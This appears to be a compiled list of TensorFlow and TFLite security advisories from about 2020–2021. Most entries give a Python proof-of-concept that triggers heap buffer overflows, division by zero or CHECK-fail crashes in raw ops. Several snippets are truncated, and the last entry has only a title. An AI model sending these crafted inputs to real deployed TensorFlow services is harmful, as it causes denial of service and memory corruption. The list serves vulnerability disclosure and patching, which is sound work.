An attacker can cause a heap buffer overflow in tf.raw_ops.RaggedTensorToTensor: import tensorflow as tf shape = tf.constant([10, 10], shape=[2], dtype=tf.int64) values = tf.constant(0, shape=[1], dtype=tf.int64) default_value = tf.constant(0, dtype=tf.int64) l = [849, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, …

Heap buffer overflow in `RaggedBinCount`

If the splits argument of RaggedBincount does not specify a valid SparseTensor, then an attacker can trigger a heap buffer overflow: import tensorflow as tf tf.raw_ops.RaggedBincount(splits=[0], values=[1,1,1,1,1], size=5, weights=[1,2,3,4], binary_output=False)

Heap buffer overflow in `QuantizedResizeBilinear`

An attacker can cause a heap buffer overflow in QuantizedResizeBilinear by passing in invalid thresholds for the quantization: import tensorflow as tf images = tf.constant([], shape=[0], dtype=tf.qint32) size = tf.constant([], shape=[0], dtype=tf.int32) min = tf.constant([], dtype=tf.float32) max = tf.constant([], dtype=tf.float32) tf.raw_ops.QuantizedResizeBilinear(images=images, size=size, min=min, max=max, align_corners=False, half_pixel_centers=False)

Heap buffer overflow in `QuantizedReshape`

An attacker can cause a heap buffer overflow in QuantizedReshape by passing in invalid thresholds for the quantization: import tensorflow as tf tensor = tf.constant([], dtype=tf.qint32) shape = tf.constant([], dtype=tf.int32) input_min = tf.constant([], dtype=tf.float32) input_max = tf.constant([], dtype=tf.float32) tf.raw_ops.QuantizedReshape(tensor=tensor, shape=shape, input_min=input_min, input_max=input_max)

Heap buffer overflow in `QuantizedMul`

An attacker can cause a heap buffer overflow in QuantizedMul by passing in invalid thresholds for the quantization: import tensorflow as tf x = tf.constant([256, 328], shape=[1, 2], dtype=tf.quint8) y = tf.constant([256, 328], shape=[1, 2], dtype=tf.quint8) min_x = tf.constant([], dtype=tf.float32) max_x = tf.constant([], dtype=tf.float32) min_y = tf.constant([], dtype=tf.float32) max_y = tf.constant([], dtype=tf.float32) tf.raw_ops.QuantizedMul(x=x, y=y, min_x=min_x, max_x=max_x, min_y=min_y, max_y=max_y)

Heap buffer overflow in `MaxPoolGrad`

The implementation of tf.raw_ops.MaxPoolGrad is vulnerable to a heap buffer overflow: import tensorflow as tf orig_input = tf.constant([0.0], shape=[1, 1, 1, 1], dtype=tf.float32) orig_output = tf.constant([0.0], shape=[1, 1, 1, 1], dtype=tf.float32) grad = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) ksize = [1, 1, 1, 1] strides = [1, 1, 1, 1] padding = "SAME" tf.raw_ops.MaxPoolGrad( orig_input=orig_input, orig_output=orig_output, grad=grad, ksize=ksize, strides=strides, padding=padding, explicit_paddings=[])

Heap buffer overflow in `MaxPool3DGradGrad`

The implementation of tf.raw_ops.MaxPool3DGradGrad is vulnerable to a heap buffer overflow: import tensorflow as tf values = [0.01] * 11 orig_input = tf.constant(values, shape=[11, 1, 1, 1, 1], dtype=tf.float32) orig_output = tf.constant([0.01], shape=[1, 1, 1, 1, 1], dtype=tf.float32) grad = tf.constant([0.01], shape=[1, 1, 1, 1, 1], dtype=tf.float32) ksize = [1, 1, 1, 1, 1] strides = [1, 1, 1, 1, 1] padding = "SAME" tf.raw_ops.MaxPool3DGradGrad( orig_input=orig_input, orig_output=orig_output, grad=grad, ksize=ksize, strides=strides, …

Heap buffer overflow in `FractionalAvgPoolGrad`

The implementation of tf.raw_ops.FractionalAvgPoolGrad is vulnerable to a heap buffer overflow: import tensorflow as tf orig_input_tensor_shape = tf.constant([1, 3, 2, 3], shape=[4], dtype=tf.int64) out_backprop = tf.constant([2], shape=[1, 1, 1, 1], dtype=tf.int64) row_pooling_sequence = tf.constant([1], shape=[1], dtype=tf.int64) col_pooling_sequence = tf.constant([1], shape=[1], dtype=tf.int64) tf.raw_ops.FractionalAvgPoolGrad( orig_input_tensor_shape=orig_input_tensor_shape, out_backprop=out_backprop, row_pooling_sequence=row_pooling_sequence, col_pooling_sequence=col_pooling_sequence, overlapping=False)

Heap buffer overflow in `Conv3DBackprop*`

Missing validation between arguments to tf.raw_ops.Conv3DBackprop* operations can result in heap buffer overflows: import tensorflow as tf input_sizes = tf.constant([1, 1, 1, 1, 2], shape=[5], dtype=tf.int32) filter_tensor = tf.constant([734.6274508233133, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0], shape=[4, 1, 6, 1, 1], dtype=tf.float32) out_backprop = tf.constant([-10.0], shape=[1, 1, 1, 1, 1], dtype=tf.float32) tf.raw_ops.Conv3DBackpropInputV2(input_sizes=input_sizes, filter=filter_tensor, out_backprop=out_backprop, …

Heap buffer overflow in `Conv2DBackpropFilter`

An attacker can cause a heap buffer overflow to occur in Conv2DBackpropFilter: import tensorflow as tf input_tensor = tf.constant([386.078431372549, 386.07843139643234], shape=[1, 1, 1, 2], dtype=tf.float32) filter_sizes = tf.constant([1, 1, 1, 1], shape=[4], dtype=tf.int32) out_backprop = tf.constant([386.078431372549], shape=[1, 1, 1, 1], dtype=tf.float32) tf.raw_ops.Conv2DBackpropFilter( input=input_tensor, filter_sizes=filter_sizes, out_backprop=out_backprop, strides=[1, 66, 49, 1], use_cudnn_on_gpu=True, padding='VALID', explicit_paddings=[], data_format='NHWC', dilations=[1, 1, 1, 1] ) Alternatively, passing empty tensors also results in similar behavior: import tensorflow as …

Heap buffer overflow in `BandedTriangularSolve`

An attacker can trigger a heap buffer overflow in Eigen implementation of tf.raw_ops.BandedTriangularSolve: import tensorflow as tf import numpy as np matrix_array = np.array([]) matrix_tensor = tf.convert_to_tensor(np.reshape(matrix_array,(0,1)),dtype=tf.float32) rhs_array = np.array([1,1]) rhs_tensor = tf.convert_to_tensor(np.reshape(rhs_array,(1,2)),dtype=tf.float32) tf.raw_ops.BandedTriangularSolve(matrix=matrix_tensor,rhs=rhs_tensor)

Heap buffer overflow in `AvgPool3DGrad`

The implementation of tf.raw_ops.AvgPool3DGrad is vulnerable to a heap buffer overflow: import tensorflow as tf orig_input_shape = tf.constant([10, 6, 3, 7, 7], shape=[5], dtype=tf.int32) grad = tf.constant([0.01, 0, 0], shape=[3, 1, 1, 1, 1], dtype=tf.float32) ksize = [1, 1, 1, 1, 1] strides = [1, 1, 1, 1, 1] padding = "SAME" tf.raw_ops.AvgPool3DGrad( orig_input_shape=orig_input_shape, grad=grad, ksize=ksize, strides=strides, padding=padding)

Heap buffer overflow caused by rounding

An attacker can trigger a heap buffer overflow in tf.raw_ops.QuantizedResizeBilinear by manipulating input values so that float rounding results in off-by-one error in accessing image elements: import tensorflow as tf l = [256, 328, 361, 17, 361, 361, 361, 361, 361, 361, 361, 361, 361, 361, 384] images = tf.constant(l, shape=[1, 1, 15, 1], dtype=tf.qint32) size = tf.constant([12, 6], shape=[2], dtype=tf.int32) min = tf.constant(80.22522735595703) max = tf.constant(80.39215850830078) tf.raw_ops.QuantizedResizeBilinear(images=images, size=size, min=min, …

Heap buffer overflow and undefined behavior in `FusedBatchNorm`

The implementation of tf.raw_ops.FusedBatchNorm is vulnerable to a heap buffer overflow: import tensorflow as tf x = tf.zeros([10, 10, 10, 6], dtype=tf.float32) scale = tf.constant([0.0], shape=[1], dtype=tf.float32) offset = tf.constant([0.0], shape=[1], dtype=tf.float32) mean = tf.constant([0.0], shape=[1], dtype=tf.float32) variance = tf.constant([0.0], shape=[1], dtype=tf.float32) epsilon = 0.0 exponential_avg_factor = 0.0 data_format = "NHWC" is_training = False tf.raw_ops.FusedBatchNorm( x=x, scale=scale, offset=offset, mean=mean, variance=variance, epsilon=epsilon, exponential_avg_factor=exponential_avg_factor, data_format=data_format, is_training=is_training) If the tensors are empty, the …

Division by zero in TFLite's implementation of `TransposeConv`

The optimized implementation of the TransposeConv TFLite operator is vulnerable to a division by zero error: int height_col = (height + pad_t + pad_b - filter_h) / stride_h + 1; int width_col = (width + pad_l + pad_r - filter_w) / stride_w + 1; An attacker can craft a model such that stride_{h,w} values are 0. Code calling this function must validate these arguments.

Division by zero in TFLite's implementation of `SpaceToDepth`

The Prepare step of the SpaceToDepth TFLite operator does not check for 0 before division. const int block_size = params->block_size; const int input_height = input->dims->data[1]; const int input_width = input->dims->data[2]; int output_height = input_height / block_size; int output_width = input_width / block_size; An attacker can craft a model such that params->block_size would be zero.

Division by zero in TFLite's implementation of `SpaceToBatchNd`

The implementation of the SpaceToBatchNd TFLite operator is vulnerable to a division by zero error: TF_LITE_ENSURE_EQ(context, final_dim_size % block_shape[dim], 0); output_size->data[dim + 1] = final_dim_size / block_shape[dim]; An attacker can craft a model such that one dimension of the block input is 0. Hence, the corresponding value in block_shape is 0.

Division by zero in TFLite's implementation of `OneHot`

The implementation of the OneHot TFLite operator is vulnerable to a division by zero error: int prefix_dim_size = 1; for (int i = 0; i < op_context.axis; ++i) { prefix_dim_size *= op_context.indices->dims->data[i]; } const int suffix_dim_size = NumElements(op_context.indices) / prefix_dim_size; An attacker can craft a model such that at least one of the dimensions of indices would be 0. In turn, the prefix_dim_size value would become 0.

Division by zero in TFLite's implementation of `BatchToSpaceNd`

The implementation of the BatchToSpaceNd TFLite operator is vulnerable to a division by zero error: TF_LITE_ENSURE_EQ(context, output_batch_size % block_shape[dim], 0); output_batch_size = output_batch_size / block_shape[dim]; An attacker can craft a model such that one dimension of the block input is 0. Hence, the corresponding value in block_shape is 0.

Division by zero in padding computation in TFLite

The TFLite computation for size of output after padding, ComputeOutSize, does not check that the stride argument is not 0 before doing the division. inline int ComputeOutSize(TfLitePadding padding, int image_size, int filter_size, int stride, int dilation_rate = 1) { int effective_filter_size = (filter_size - 1) * dilation_rate + 1; switch (padding) { case kTfLitePaddingSame: return (image_size + stride - 1) / stride; case kTfLitePaddingValid: return (image_size + stride - effective_filter_size) …

Division by zero in `Conv3D`

A malicious user could trigger a division by 0 in Conv3D implementation: import tensorflow as tf input_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) filter_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) tf.raw_ops.Conv3D(input=input_tensor, filter=filter_tensor, strides=[1, 56, 56, 56, 1], padding='VALID', data_format='NDHWC', dilations=[1, 1, 1, 23, 1])

Division by zero in `Conv2DBackpropFilter`

An attacker can cause a division by zero to occur in Conv2DBackpropFilter: import tensorflow as tf input_tensor = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) filter_sizes = tf.constant([0, 0, 0, 0], shape=[4], dtype=tf.int32) out_backprop = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) tf.raw_ops.Conv2DBackpropFilter( input=input_tensor, filter_sizes=filter_sizes, out_backprop=out_backprop, strides=[1, 1, 1, 1], use_cudnn_on_gpu=False, padding='SAME', explicit_paddings=[], data_format='NHWC', dilations=[1, 1, 1, 1] )

Division by 0 in `SparseMatMul`

An attacker can cause a denial of service via a FPE runtime error in tf.raw_ops.SparseMatMul: import tensorflow as tf a = tf.constant([100.0, 100.0, 100.0, 100.0], shape=[2, 2], dtype=tf.float32) b = tf.constant([], shape=[0, 2], dtype=tf.float32) tf.raw_ops.SparseMatMul( a=a, b=b, transpose_a=True, transpose_b=True, a_is_sparse=True, b_is_sparse=True) The division by 0 occurs deep in Eigen code because the b tensor is empty.

Division by 0 in `Reverse`

An attacker can cause a denial of service via a FPE runtime error in tf.raw_ops.Reverse: import tensorflow as tf tensor_input = tf.constant([], shape=[0, 1, 1], dtype=tf.int32) dims = tf.constant([False, True, False], shape=[3], dtype=tf.bool) tf.raw_ops.Reverse(tensor=tensor_input, dims=dims)

Division by 0 in `QuantizedMul`

An attacker can trigger a division by 0 in tf.raw_ops.QuantizedMul: import tensorflow as tf x = tf.zeros([4, 1], dtype=tf.quint8) y = tf.constant([], dtype=tf.quint8) min_x = tf.constant(0.0) max_x = tf.constant(0.0010000000474974513) min_y = tf.constant(0.0) max_y = tf.constant(0.0010000000474974513) tf.raw_ops.QuantizedMul(x=x, y=y, min_x=min_x, max_x=max_x, min_y=min_y, max_y=max_y)

Division by 0 in `QuantizedConv2D`

An attacker can trigger a division by 0 in tf.raw_ops.QuantizedConv2D: import tensorflow as tf input = tf.zeros([1, 1, 1, 1], dtype=tf.quint8) filter = tf.constant([], shape=[1, 0, 1, 1], dtype=tf.quint8) min_input = tf.constant(0.0) max_input = tf.constant(0.0001) min_filter = tf.constant(0.0) max_filter = tf.constant(0.0001) strides = [1, 1, 1, 1] padding = "SAME" tf.raw_ops.QuantizedConv2D(input=input, filter=filter, min_input=min_input, max_input=max_input, min_filter=min_filter, max_filter=max_filter, strides=strides, padding=padding)

Division by 0 in `QuantizedBiasAdd`

An attacker can trigger an integer division by zero undefined behavior in tf.raw_ops.QuantizedBiasAdd: import tensorflow as tf input_tensor = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.quint8) bias = tf.constant([], shape=[0], dtype=tf.quint8) min_input = tf.constant(-10.0, dtype=tf.float32) max_input = tf.constant(-10.0, dtype=tf.float32) min_bias = tf.constant(-10.0, dtype=tf.float32) max_bias = tf.constant(-10.0, dtype=tf.float32) tf.raw_ops.QuantizedBiasAdd(input=input_tensor, bias=bias, min_input=min_input, max_input=max_input, min_bias=min_bias, max_bias=max_bias, out_type=tf.qint32)

Division by 0 in `QuantizedBatchNormWithGlobalNormalization`

An attacker can cause a runtime division by zero error and denial of service in tf.raw_ops.QuantizedBatchNormWithGlobalNormalization: import tensorflow as tf t = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.quint8) t_min = tf.constant(-10.0, dtype=tf.float32) t_max = tf.constant(-10.0, dtype=tf.float32) m = tf.constant([], shape=[0], dtype=tf.quint8) m_min = tf.constant(-10.0, dtype=tf.float32) m_max = tf.constant(-10.0, dtype=tf.float32) v = tf.constant([], shape=[0], dtype=tf.quint8) v_min = tf.constant(-10.0, dtype=tf.float32) v_max = tf.constant(-10.0, dtype=tf.float32) beta = tf.constant([], shape=[0], dtype=tf.quint8) beta_min = tf.constant(-10.0, …

Division by 0 in `QuantizedAdd`

An attacker can cause a runtime division by zero error and denial of service in tf.raw_ops.QuantizedAdd: import tensorflow as tf x = tf.constant([68, 228], shape=[2, 1], dtype=tf.quint8) y = tf.constant([], shape=[2, 0], dtype=tf.quint8) min_x = tf.constant(10.723421015884028) max_x = tf.constant(15.19578006631113) min_y = tf.constant(-5.539003866682977) max_y = tf.constant(42.18819949559947) tf.raw_ops.QuantizedAdd(x=x, y=y, min_x=min_x, max_x=max_x, min_y=min_y, max_y=max_y)

Division by 0 in `MaxPoolGradWithArgmax`

The implementation of tf.raw_ops.MaxPoolGradWithArgmax is vulnerable to a division by 0: import tensorflow as tf input = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) grad = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) argmax = tf.constant([], shape=[0], dtype=tf.int64) ksize = [1, 1, 1, 1] strides = [1, 1, 1, 1] tf.raw_ops.MaxPoolGradWithArgmax( input=input, grad=grad, argmax=argmax, ksize=ksize, strides=strides, padding='SAME', include_batch_in_index=False)

Division by 0 in `FusedBatchNorm`

An attacker can cause a denial of service via a FPE runtime error in tf.raw_ops.FusedBatchNorm: import tensorflow as tf x = tf.constant([], shape=[1, 1, 1, 0], dtype=tf.float32) scale = tf.constant([], shape=[0], dtype=tf.float32) offset = tf.constant([], shape=[0], dtype=tf.float32) mean = tf.constant([], shape=[0], dtype=tf.float32) variance = tf.constant([], shape=[0], dtype=tf.float32) epsilon = 0.0 exponential_avg_factor = 0.0 data_format = "NHWC" is_training = False tf.raw_ops.FusedBatchNorm( x=x, scale=scale, offset=offset, mean=mean, variance=variance, epsilon=epsilon, exponential_avg_factor=exponential_avg_factor, data_format=data_format, is_training=is_training)

Division by 0 in `FractionalAvgPool`

An attacker can cause a runtime division by zero error and denial of service in tf.raw_ops.FractionalAvgPool: import tensorflow as tf value = tf.constant([60], shape=[1, 1, 1, 1], dtype=tf.int32) pooling_ratio = [1.0, 1.0000014345305555, 1.0, 1.0] pseudo_random = False overlapping = False deterministic = False seed = 0 seed2 = 0 tf.raw_ops.FractionalAvgPool( value=value, pooling_ratio=pooling_ratio, pseudo_random=pseudo_random, overlapping=overlapping, deterministic=deterministic, seed=seed, seed2=seed2)

Division by 0 in `DenseCountSparseOutput`

An attacker can cause a denial of service via a FPE runtime error in tf.raw_ops.DenseCountSparseOutput: import tensorflow as tf values = tf.constant([], shape=[0, 0], dtype=tf.int64) weights = tf.constant([]) tf.raw_ops.DenseCountSparseOutput( values=values, weights=weights, minlength=-1, maxlength=58, binary_output=True)

Division by 0 in `Conv3DBackprop*`

The tf.raw_ops.Conv3DBackprop* operations fail to validate that the input tensors are not empty. In turn, this would result in a division by 0: import tensorflow as tf input_sizes = tf.constant([0, 0, 0, 0, 0], shape=[5], dtype=tf.int32) filter_tensor = tf.constant([], shape=[0, 0, 0, 1, 0], dtype=tf.float32) out_backprop = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) tf.raw_ops.Conv3DBackpropInputV2(input_sizes=input_sizes, filter=filter_tensor, out_backprop=out_backprop, strides=[1, 1, 1, 1, 1], padding='SAME', data_format='NDHWC', dilations=[1, 1, 1, 1, 1]) import …

Division by 0 in `Conv2DBackpropInput`

An attacker can trigger a division by 0 in tf.raw_ops.Conv2DBackpropInput: import tensorflow as tf input_tensor = tf.constant([52, 1, 1, 5], shape=[4], dtype=tf.int32) filter_tensor = tf.constant([], shape=[0, 1, 5, 0], dtype=tf.float32) out_backprop = tf.constant([], shape=[52, 1, 1, 0], dtype=tf.float32) tf.raw_ops.Conv2DBackpropInput(input_sizes=input_tensor, filter=filter_tensor, out_backprop=out_backprop, strides=[1, 1, 1, 1], use_cudnn_on_gpu=True, padding='SAME', explicit_paddings=[], data_format='NHWC', dilations=[1, 1, 1, 1])

Division by 0 in `Conv2DBackpropFilter`

An attacker can trigger a division by 0 in tf.raw_ops.Conv2DBackpropFilter: import tensorflow as tf input_tensor = tf.constant([], shape=[0, 0, 1, 0], dtype=tf.float32) filter_sizes = tf.constant([1, 1, 1, 1], shape=[4], dtype=tf.int32) out_backprop = tf.constant([], shape=[0, 0, 1, 1], dtype=tf.float32) tf.raw_ops.Conv2DBackpropFilter(input=input_tensor, filter_sizes=filter_sizes, out_backprop=out_backprop, strides=[1, 66, 18, 1], use_cudnn_on_gpu=True, padding='SAME', explicit_paddings=[], data_format='NHWC', dilations=[1, 1, 1, 1])

Division by 0 in `Conv2D`

An attacker can trigger a division by 0 in tf.raw_ops.Conv2D: import tensorflow as tf input = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) filter = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) strides = [1, 1, 1, 1] padding = "SAME" tf.raw_ops.Conv2D(input=input, filter=filter, strides=strides, padding=padding)

CHECK-failure in `UnsortedSegmentJoin`

An attacker can cause a denial of service by controlling the values of num_segments tensor argument for UnsortedSegmentJoin: import tensorflow as tf inputs = tf.constant([], dtype=tf.string) segment_ids = tf.constant([], dtype=tf.int32) num_segments = tf.constant([], dtype=tf.int32) separator = '' tf.raw_ops.UnsortedSegmentJoin( inputs=inputs, segment_ids=segment_ids, num_segments=num_segments, separator=separator)

CHECK-fail in tf.raw_ops.EncodePng

An attacker can trigger a CHECK fail in PNG encoding by providing an empty input tensor as the pixel data: import tensorflow as tf image = tf.zeros([0, 0, 3]) image = tf.cast(image, dtype=tf.uint8) tf.raw_ops.EncodePng(image=image)

CHECK-fail in SparseCross due to type confusion

The API of tf.raw_ops.SparseCross allows combinations which would result in a CHECK-failure and denial of service: import tensorflow as tf hashed_output = False num_buckets = 1949315406 hash_key = 1869835877 out_type = tf.string internal_type = tf.string indices_1 = tf.constant([0, 6], shape=[1, 2], dtype=tf.int64) indices_2 = tf.constant([0, 0], shape=[1, 2], dtype=tf.int64) indices = [indices_1, indices_2] values_1 = tf.constant([0], dtype=tf.int64) values_2 = tf.constant([72], dtype=tf.int64) values = [values_1, values_2] batch_size = 4 shape_1 = …

CHECK-fail in SparseConcat

An attacker can trigger a denial of service via a CHECK-fail in tf.raw_ops.SparseConcat: import tensorflow as tf import numpy as np indices_1 = tf.constant([[514, 514], [514, 514]], dtype=tf.int64) indices_2 = tf.constant([[514, 530], [599, 877]], dtype=tf.int64) indices = [indices_1, indices_2] values_1 = tf.zeros([0], dtype=tf.int64) values_2 = tf.zeros([0], dtype=tf.int64) values = [values_1, values_2] shape_1 = tf.constant([442, 514, 514, 515, 606, 347, 943, 61, 2], dtype=tf.int64) shape_2 = tf.zeros([9], dtype=tf.int64) shapes = [shape_1, …

CHECK-fail in DrawBoundingBoxes

An attacker can trigger a denial of service via a CHECK failure by passing an empty image to tf.raw_ops.DrawBoundingBoxes: import tensorflow as tf images = tf.fill([53, 0, 48, 1], 0.) boxes = tf.fill([53, 31, 4], 0.) boxes = tf.Variable(boxes) boxes[0, 0, 0].assign(3.90621) tf.raw_ops.DrawBoundingBoxes(images=images, boxes=boxes)

CHECK-fail in AddManySparseToTensorsMap

An attacker can trigger a denial of service via a CHECK-fail in tf.raw_ops.AddManySparseToTensorsMap: import tensorflow as tf import numpy as np sparse_indices = tf.constant(530, shape=[1, 1], dtype=tf.int64) sparse_values = tf.ones([1], dtype=tf.int64) shape = tf.Variable(tf.ones([55], dtype=tf.int64)) shape[:8].assign(np.array([855, 901, 429, 892, 892, 852, 93, 96], dtype=np.int64)) tf.raw_ops.AddManySparseToTensorsMap(sparse_indices=sparse_indices, sparse_values=sparse_values, sparse_shape=shape)

CHECK-fail in `tf.raw_ops.RFFT`

An attacker can cause a denial of service by exploiting a CHECK-failure coming from the implementation of tf.raw_ops.RFFT: import tensorflow as tf inputs = tf.constant([1], shape=[1], dtype=tf.float32) fft_length = tf.constant([0], shape=[1], dtype=tf.int32) tf.raw_ops.RFFT(input=inputs, fft_length=fft_length) The above example causes Eigen code to operate on an empty matrix. This triggers an assertion and causes program termination.

CHECK-fail in `tf.raw_ops.IRFFT`

An attacker can cause a denial of service by exploiting a CHECK-failure coming from the implementation of tf.raw_ops.IRFFT: import tensorflow as tf values = [-10.0] * 130 values[0] = -9.999999999999995 inputs = tf.constant(values, shape=[10, 13], dtype=tf.float32) inputs = tf.cast(inputs, dtype=tf.complex64) fft_length = tf.constant([0], shape=[1], dtype=tf.int32) tf.raw_ops.IRFFT(input=inputs, fft_length=fft_length) The above example causes Eigen code to operate on an empty matrix. This triggers an assertion and causes program termination.

CHECK-fail in `QuantizeAndDequantizeV4Grad`

An attacker can trigger a denial of service via a CHECK-fail in tf.raw_ops.QuantizeAndDequantizeV4Grad: import tensorflow as tf gradient_tensor = tf.constant([0.0], shape=[1]) input_tensor = tf.constant([0.0], shape=[1]) input_min = tf.constant([[0.0]], shape=[1, 1]) input_max = tf.constant([[0.0]], shape=[1, 1]) tf.raw_ops.QuantizeAndDequantizeV4Grad( gradients=gradient_tensor, input=input_tensor, input_min=input_min, input_max=input_max, axis=0)

CHECK-fail in `LoadAndRemapMatrix`

An attacker can cause a denial of service by exploiting a CHECK-failure coming from tf.raw_ops.LoadAndRemapMatrix: import tensorflow as tf ckpt_path = tf.constant([], shape=[0], dtype=tf.string) old_tensor_name = tf.constant("") row_remapping = tf.constant([], shape=[0], dtype=tf.int64) col_remapping = tf.constant([1], shape=[1], dtype=tf.int64) initializing_values = tf.constant(1.0) tf.raw_ops.LoadAndRemapMatrix( ckpt_path=ckpt_path, old_tensor_name=old_tensor_name, row_remapping=row_remapping, col_remapping=col_remapping, initializing_values=initializing_values, num_rows=0, num_cols=1)

CHECK-fail in `CTCGreedyDecoder`

An attacker can trigger a denial of service via a CHECK-fail in tf.raw_ops.CTCGreedyDecoder: import tensorflow as tf inputs = tf.constant([], shape=[18, 2, 0], dtype=tf.float32) sequence_length = tf.constant([-100, 17], shape=[2], dtype=tf.int32) merge_repeated = False tf.raw_ops.CTCGreedyDecoder(inputs=inputs, sequence_length=sequence_length, merge_repeated=merge_repeated)

CHECK-fail due to integer overflow

An attacker can trigger a denial of service via a CHECK-fail caused by an integer overflow in constructing a new tensor shape: import tensorflow as tf input_layer = 2**60-1 sparse_data = tf.raw_ops.SparseSplit( split_dim=1, indices=[(0, 0), (0, 1), (0, 2), (4, 3), (5, 0), (5, 1)], values=[1.0, 1.0, 1.0, 1.0, 1.0, 1.0], shape=(input_layer, input_layer), num_split=2, name=None )

2020

Write to immutable memory region in TensorFlow

The tf.raw_ops.ImmutableConst operation returns a constant tensor created from a memory mapped file which is assumed immutable. However, if the type of the tensor is not an integral type, the operation crashes the Python interpreter as it tries to write to the memory area: >>> import tensorflow as tf >>> with open('/tmp/test.txt','w') as f: f.write('a'*128) >>> tf.raw_ops.ImmutableConst(dtype=tf.string,shape=2, memory_region_name='/tmp/test.txt') If the file is too small, TensorFlow properly returns an error as …

Uninitialized memory access in TensorFlow

Under certain cases, a saved model can trigger use of uninitialized values during code execution. This is caused by having tensor buffers be filled with the default value of the type but forgetting to default initialize the quantized floating point types in Eigen: struct QUInt8 { QUInt8() {} // … uint8_t value; }; struct QInt16 { QInt16() {} // … int16_t value; }; struct QUInt16 { QUInt16() {} // … …

Lack of validation in data format attributes in TensorFlow

The tf.raw_ops.DataFormatVecPermute API does not validate the src_format and dst_format attributes. The code assumes that these two arguments define a permutation of NHWC. However, these assumptions are not checked and this can result in uninitialized memory accesses, read outside of bounds and even crashes. >>> import tensorflow as tf >>> tf.raw_ops.DataFormatVecPermute(x=[1,4], src_format='1234', dst_format='1234') <tf.Tensor: shape=(2,), dtype=int32, numpy=array([4, 757100143], dtype=int32)> … >>> tf.raw_ops.DataFormatVecPermute(x=[1,4], src_format='HHHH', dst_format='WWWW') <tf.Tensor: shape=(2,), dtype=int32, numpy=array([4, 32701], dtype=int32)> …

Heap out of bounds access in MakeEdge in TensorFlow

Under certain cases, loading a saved model can result in accessing uninitialized memory while building the computation graph. The MakeEdge function creates an edge between one output tensor of the src node (given by output_index) and the input slot of the dst node (given by input_index). This is only possible if the types of the tensors on both sides coincide, so the function begins by obtaining the corresponding DataType values …

Float cast overflow undefined behavior

When the boxes argument of tf.image.crop_and_resize has a very large value, the CPU kernel implementation receives it as a C++ nan floating point value. Attempting to operate on this is undefined behavior which later produces a segmentation fault.
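
A minimal reproducer sketch, assuming the behavior described above (the input shapes and the oversized box coordinate are illustrative placeholders, not values from the advisory):

import tensorflow as tf

# Illustrative values only: a box coordinate far beyond float32 range reaches
# the CPU kernel, which the advisory describes as undefined behavior that can
# end in a segmentation fault.
image = tf.zeros([1, 4, 4, 1], dtype=tf.float32)
boxes = [[1.0e40, 0.0, 1.0, 1.0]]  # hypothetical, very large coordinate
tf.image.crop_and_resize(image, boxes, box_indices=[0], crop_size=[2, 2])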

Segfault in Tensorflow

In eager mode, TensorFlow does not set the session state. Hence, calling tf.raw_ops.GetSessionHandle or tf.raw_ops.GetSessionHandleV2 results in a null pointer dereference: https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/kernels/session_ops.cc#L45 In the above snippet, in eager mode, ctx->session_state() returns nullptr. Since code immediately dereferences this, we get a segmentation fault.
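
A minimal sketch of the call path described above (the tensor value is arbitrary); on affected versions, invoking the op under eager execution is reported to crash instead of returning an error:

import tensorflow as tf

# Eager execution is the default in TF 2.x, so no session state is set.
# Per the advisory, ctx->session_state() is then a null pointer on affected builds.
tf.raw_ops.GetSessionHandle(value=tf.constant(42.0))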

Segfault in Tensorflow

The RaggedCountSparseOutput implementation does not validate that the input arguments form a valid ragged tensor. In particular, there is no validation that the values in the splits tensor generate a valid partitioning of the values tensor. Thus, the following code sets up conditions to cause a heap buffer overflow: auto per_batch_counts = BatchedMap<W>(num_batches); int batch_idx = 0; for (int idx = 0; idx < num_values; ++idx) { while (idx >= …

Segfault in Tensorflow

The tf.raw_ops.Switch operation takes as input a tensor and a boolean and outputs two tensors. Depending on the boolean value, one of the tensors is exactly the input tensor whereas the other one should be an empty tensor.
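
A sketch of invoking the op directly in eager mode (the input values are arbitrary); per the advisory title, only one of the two outputs is actually produced, which is what can lead to a segfault on affected versions:

import tensorflow as tf

# Switch routes `data` to one of two outputs depending on `pred`; the other
# output is meant to be an empty tensor.
tf.raw_ops.Switch(data=tf.constant([1.0, 2.0]), pred=tf.constant(True))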

Segfault and data corruption in tensorflow-lite

To mimic Python's indexing with negative values, TFLite uses ResolveAxis to convert negative values to positive indices. However, the only check that the converted index is now valid is only present in debug builds: https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/lite/kernels/internal/reference/reduce.h#L68-L72 If the DCHECK does not trigger, then code execution moves ahead with a negative index. This, in turn, results in accessing data out of bounds which results in segfaults and/or data corruption.

Out of bounds write in tensorflow-lite

In TensorFlow Lite, models using segment sum can trigger a write out of bounds / segmentation fault if the segment ids are not sorted. Code assumes that the segment ids are in increasing order, using the last element of the tensor holding them to determine the dimensionality of the output tensor: https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/lite/kernels/segment_sum.cc#L39-L44 This results in allocating insufficient memory for the output tensor and in a write outside the bounds of the output …

Out of bounds access in tensorflow-lite

